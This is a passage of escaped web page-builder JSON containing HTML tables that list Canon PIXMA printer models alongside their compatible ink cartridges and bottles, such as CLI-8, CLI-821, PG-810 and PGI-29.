width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td 